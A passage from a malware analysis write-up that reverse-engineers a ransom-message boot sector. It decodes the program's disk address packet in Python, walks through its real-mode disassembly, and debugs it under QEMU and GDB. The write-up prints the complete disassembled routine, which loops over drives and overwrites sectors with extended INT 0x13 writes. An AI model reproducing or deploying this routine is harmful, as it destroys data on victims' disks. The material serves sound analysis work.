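def parse_dap(raw: bytes) -> DiskAddressPacket:
    """Decode the first 16 bytes of a little-endian disk address packet."""
    return DiskAddressPacket(*struct.unpack("<BBBBHHQ", raw[:16]))


# Bytes 0x72 through 0x81 of the raw boot sector, as shown in the hexdump.
STATIC_DAP = bytes.fromhex("10000100000000000100000000000000")
print(parse_dap(STATIC_DAP))

# What the packet looks like after the DWORD write at offset 0x28.
RUNTIME_DAP = STATIC_DAP[:4] + struct.pack("<I", 0x7C82) + STATIC_DAP[8:]
print(parse_dap(RUNTIME_DAP))
```

The first packet decodes to a 16-byte DAP that transfers one block starting at LBA 1 with a null buffer address. The second shows the buffer pointing at 0000:7c82 once the boot code has patched it.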

Note: Earlier, the value at cs is moved into the transfer buffer offset’s third byte. The purpose for this is not clear, as the instruction shown at offset 0x28 immediately overwrites it with a DWORD. This is the kind of thing that dynamic analysis will help answer.

The DAP uses these settings on the first invocation of INT 0x13 and on each error. When CF is 1 (indicating an error), the code also resets the target LBA (0x7a - 0x81) to 1 as it moves on to the next disk:

fe 06 87 7c          	inc    BYTE PTR ds:0x7c87
66 c7 06 7a 7c 01 00 	mov    DWORD PTR ds:0x7c7a,0x1
00 00 
66 c7 06 7e 7c 00 00 	mov    DWORD PTR ds:0x7c7e,0x0
00 00 

If INT 0x13 is successful (CF == 0), the loop stays on the current disk and advances by 199 (0xc7) sectors, where it will attempt to overwrite data with the ransom message.

  5d:	66 81 06 7a 7c c7 00 	add    DWORD PTR ds:0x7c7a,0xc7
  64:	00 00 
  66:	66 81 16 7e 7c 00 00 	adc    DWORD PTR ds:0x7c7e,0x0

What’s interesting to me is on offset 0x66. We could decompile this line as:

*((uint32_t *)(ds+0x7c7e)) += (0x0 + CF)

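However, the branch leading to 0x5d is only possible if CF == 0 after INT 0x13, so the carry that ADC consumes has to come from the ADD at 0x5d, which sets CF only when the low 32 bits of the LBA overflow. That makes the pair a 64-bit addition, and the ADC should only matter on disks with more than 2^32 sectors. Perhaps dynamic analysis could confirm this.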
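For reference, an ADD followed by an ADC on adjacent dwords is the usual x86 idiom for adding to a 64-bit value in two 32-bit halves. A minimal Python sketch of that arithmetic follows; add_adc is a made-up name, and the second input is chosen specifically to force an overflow.

```python
MASK32 = 0xFFFFFFFF


def add_adc(low: int, high: int, increment: int) -> tuple[int, int]:
    """Mimic `add [low], imm` followed by `adc [high], 0` on 32-bit halves."""
    total = low + increment
    carry = 1 if total > MASK32 else 0    # CF as left behind by the ADD
    new_low = total & MASK32
    new_high = (high + carry) & MASK32    # the ADC folds that CF into the high half
    return new_low, new_high


print(add_adc(0x00000001, 0, 0xC7))   # (200, 0)
print(add_adc(0xFFFFFF39, 0, 0xC7))   # (0, 1)
```

The high half only changes once the low half wraps around, which takes roughly 4.29 billion sectors. This matches the comparison against 0xffffff38 in Ghidra’s decompilation.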

Debugging

Debugging real-mode code is feasible with QEMU, but there are some limits with the way that newer versions handle it. I found it easier to install Debian 9 in a VM, update using the archive repos, and install its version of QEMU and GDB. It’s a small bit of setup, but it works fine.

$ lsb_release -a
No LSB modules are available.
Distributor ID:	Debian
Description:	Debian GNU/Linux 9.7 (stretch)
Release:	    9.7
Codename:	    stretch

$ uname -a
Linux ... 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

$ qemu-system-x86_64 --version
QEMU emulator version 2.8.1(Debian 1:2.8+dfsg-6+deb9u17)
Copyright (c) 2003-2016 Fabrice Bellard and the QEMU Project developers

$ apt-cache policy gdb qemu-system
gdb:
  Installed: 7.12-6
  Candidate: 7.12-6
  Version table:
 *** 7.12-6 500
        500 http://archive.debian.org/debian stretch/main amd64 Packages
        100 /var/lib/dpkg/status
qemu-system:
  Installed: 1:2.8+dfsg-6+deb9u17
  Candidate: 1:2.8+dfsg-6+deb9u17
  Version table:
 *** 1:2.8+dfsg-6+deb9u17 500
        500 http://archive.debian.org/debian-security stretch/updates/main amd64 Packages
        100 /var/lib/dpkg/status
     1:2.8+dfsg-6+deb9u9 500
        500 http://archive.debian.org/debian stretch/main amd64 Packages

Note: Newer versions of QEMU will display inaccurate disassembly. This is annoying and gets in the way of debugging efforts.

First, run the QEMU system with debug options:

qemu-system-i386 \
    -drive format=raw,file=disk.raw,index=0 \
    -s -S

-s opens a GDB server on TCP port 1234, and -S pauses execution at startup so you can attach the debugger.

We can now use GDB:

$ gdb \
    -ex 'target remote localhost:1234' \
    -ex 'set architecture i8086' \
    -ex 'break *0x7c00' \
    -ex 'continue' \
    -ex 'set disassembly-flavor intel' \
    -ex 'x/36i $pc' \
    -q

Remote debugging using localhost:1234
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0x0000fff0 in ?? ()
warning: A handler for the OS ABI "GNU/Linux" is not built into this configuration
of GDB.  Attempting to continue with the default i8086 settings.

The target architecture is assumed to be i8086
Breakpoint 1 at 0x7c00
Continuing.

Breakpoint 1, 0x00007c00 in ?? ()
=> 0x7c00:	jmp    0x7c02
   0x7c02:	mov    ax,cs
   0x7c04:	mov    ds,ax
   0x7c06:	mov    si,0x7c88
   0x7c09:	call   0x7c0c
   0x7c0c:	push   ax
   0x7c0d:	cld    
   0x7c0e:	mov    al,BYTE PTR [si]
   0x7c10:	cmp    al,0x0
   0x7c12:	je     0x7c1a
   0x7c14:	call   0x7c1c
   0x7c17:	inc    si
   0x7c18:	jmp    0x7c0e
   0x7c1a:	jmp    0x7c21
   0x7c1c:	mov    ah,0xe
   0x7c1e:	int    0x10
   0x7c20:	ret    
   0x7c21:	mov    ax,cs
   0x7c23:	mov    ds,ax
   0x7c25:	mov    ds:0x7c78,ax
   0x7c28:	mov    DWORD PTR ds:0x7c76,0x7c82
   0x7c31:	mov    ah,0x43
   0x7c33:	mov    al,0x0
   0x7c35:	mov    dl,BYTE PTR ds:0x7c87
   0x7c39:	add    dl,0x80
   0x7c3c:	mov    si,0x7c72
   0x7c3f:	int    0x13
   0x7c41:	jb     0x7c45
   0x7c43:	jae    0x7c5d
   0x7c45:	inc    BYTE PTR ds:0x7c87
   0x7c49:	mov    DWORD PTR ds:0x7c7a,0x1
   0x7c52:	mov    DWORD PTR ds:0x7c7e,0x0
   0x7c5b:	jmp    0x7c21
   0x7c5d:	add    DWORD PTR ds:0x7c7a,0xc7
   0x7c66:	adc    DWORD PTR ds:0x7c7e,0x0
   0x7c6f:	clc    
   0x7c70:	jmp    0x7c21
(gdb)

The disassembly matches the output from objdump, so the configuration works. The GDB command x/36i $pc, used as a command-line argument, dumps everything up to 0x70 (0x7c70 given the virtual offset). We can now run dynamic tests as needed.

There are a couple of things I want to test.

First, I want to check whether the carry flag CF is ever set when execution reaches 0x66, which would tell me whether the ADC instruction there ever changes anything. We can test this with a conditional breakpoint:

break *0x7c66 if ($eflags & 1)
continue

This will break at line 0x66 only if CF == 1. You can continue execution. This condition is never triggered, and the process will continue indefinitely. We can conclude that the ADC instruction has no effect here, at least on a test disk this small.

Next, I want to see what value is actually written at 0x7c78, which falls in the range of the transfer buffer address (0x7c76 - 0x7c79). Restart the debugger and QEMU. Place a breakpoint at that instruction, continue execution, and inspect the values:

break *0x7c25
continue
...
info reg cs eax

Both AX and CS are set to 0x0. No change is made to the transfer buffer address. The purpose of this instruction is still not clear, but at least we know it’s not altering the code in any meaningful way.